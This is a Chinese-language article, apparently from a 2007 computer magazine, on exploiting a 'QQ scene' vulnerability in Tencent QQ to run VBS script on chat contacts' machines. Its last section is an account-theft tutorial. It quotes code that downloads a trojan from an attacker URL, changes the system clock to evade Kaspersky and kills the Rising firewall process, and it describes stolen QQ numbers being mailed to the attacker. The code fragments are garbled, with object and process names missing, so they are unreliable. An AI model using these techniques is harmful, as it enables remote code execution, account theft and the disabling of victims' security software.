QQ場景漏洞的破解之法

根據易觀國際發佈《2007年第2季度中國即時通訊市場季度監測》報告顯示，中國活躍的IM軟件賬號已經達到了3.76億個，其中擁有2.9億活躍用戶賬號的騰訊QQ是當之無愧的IM王者。可是你知道嗎，你的QQ 現在很危險了!

　　不需要什麼高超的技巧，黑客就可以輕鬆地盜取你的QQ。想知道他們是怎麼做的以及該如何避免自己的QQ被盜嗎?快隨小編一起看看QQ場景漏洞的破解之法(屬於0DAY漏洞)。

月黑風高夜，黑客挖出了一個寶箱，裏面盛放着光彩奪目的“QQ場景漏洞”。他們驚奇的發現，不需要有什麼高超的技巧，只要懂一點基本的腳本代碼編寫，就可以輕鬆地盜取別人的QQ、祕密安裝監控軟件或破壞系統等。於是，地獄之門就被打開了，所有的QQ用戶都被恐懼籠罩着。

一、QQ場景漏洞的利用原理解析

聊天場景是QQ軟件中的一項基本功能，可以讓聊天的雙方使用同樣的場景，從而拉近聊天用戶之間的距離。不過最新的QQ場景漏洞，可能會讓大家的QQ有被盜的風險。

該漏洞的利用原理很簡單，攻擊者向其QQ列表內的用戶發送一個惡意構造的場景，場景裏面包括圖片文件、文件和文件，其中文件就是編寫惡意代碼的地方，然後在遠程系統中執行即可。

二、QQ場景漏洞的危害有多大

QQ場景漏洞的危害到底多大?重則可能系統崩潰，資料消失;輕則可能QQ被盜，這些後果都是很嚴重的。更可怕的是，漏洞的利用方法特別簡單，不需要什麼操作即可實現，會成爲大量手癢的菜鳥黑客們的最愛。

添加的腳本代碼的作用不同，造成的危害性也會不同。比如，如果是一段文件下載腳本代碼的話，那麼代碼就會自動下載設置的文件並默默地運行。如果下載的是木馬後門程序的話，黑客就可以通過木馬進行遠程控制。如果是一段格式化代碼的話，那麼磁盤中的文件就會瞬間被清除掉。

小提示：QQ場景漏洞的危害程度判斷是參考了標準的次高危害漏洞(百度搜霸遠程執行漏洞)和標準的中等危害漏洞(WMP AU文件除零漏洞)。
 

三、試用QQ場景漏洞

　　首先，將QQ場景漏洞所需的場景文件下載到本地系統，解壓後複製到系統中QQ的安裝目錄X:Program FilesTencentQQ下 

　　面，這樣在Scene文件夾中就多了一個場景目錄。現在我們就可以進行測試操作，不過爲了彈出窗口更加有個性化，我們要對場景目錄真的腳本文件進行修改。

接着，用文本編輯器打開其中的文件，在文件代碼中找到MsgBox這個消息函數，該函數後面跟着的就是該場景在執行後彈出的信息內容，這裏我們可以將它設置爲自己需要彈出的內容信息，比如設置爲“電腦報，我的最愛!”。如果你熟悉VBS腳本，可以設置更有個性的語句。　　

圖1 彈出窗口

然後，隨便在QQ聯繫人列表中找一個人，無論對方使用的是QQ還是TM都可以，雙擊打開其聊天窗口。然後點擊工具欄中的“選擇音樂場景”按鈕，在彈出的窗口中選擇打開“我的場景”標籤，並且找到一個和場景目錄名稱相同的場景。這樣這個帶有VBS腳本的場景，就會自動的下載到遠程好友的QQ 中並運行。

四、如何利用QQ場景漏洞盜QQ

漏洞用熟後，就可以開始盜QQ了。首選下載該漏洞的利用代碼，然後進行簡單的修改即可。下面就對代碼的關鍵部分進行講解。　　

iLocal = LCase("c:"):iRemote = LCase("http://www.****")

代碼作用是將文件下載到磁盤中指定的位置，我們只需要把其中的.****改爲自己的木馬地址即可。

Set ws = CreateObject（"l"）

"cmd /c set date=%date% &&date 1988-1-1 &&ping -n 30 &&date %date%",vbhide

for each ps in getobject（"winmgmts:.rootcimv2:win32_process"）ances_

if ="" then

"ntsd -c q -p le",0

這段代碼主要有兩個作用，首先是通過修改系統的時間，從而讓下載的木馬程序躲過卡巴斯基的主動防禦功能。接着用於檢測系統中是否存在瑞星防火牆，如果存在的話就結束該防火牆的進程。

當然我們可以依葫蘆畫瓢來添加結束其他進程的代碼，比如要結束金山網鏢的進程，只需要將代碼if ="" Then中的，替換爲金山網鏢的進程名稱即可。經過這一系列的處理以後，盜號木馬就能成功的獲取遠程用戶的QQ號碼，並且最終發送到我們指定的信箱裏面呢。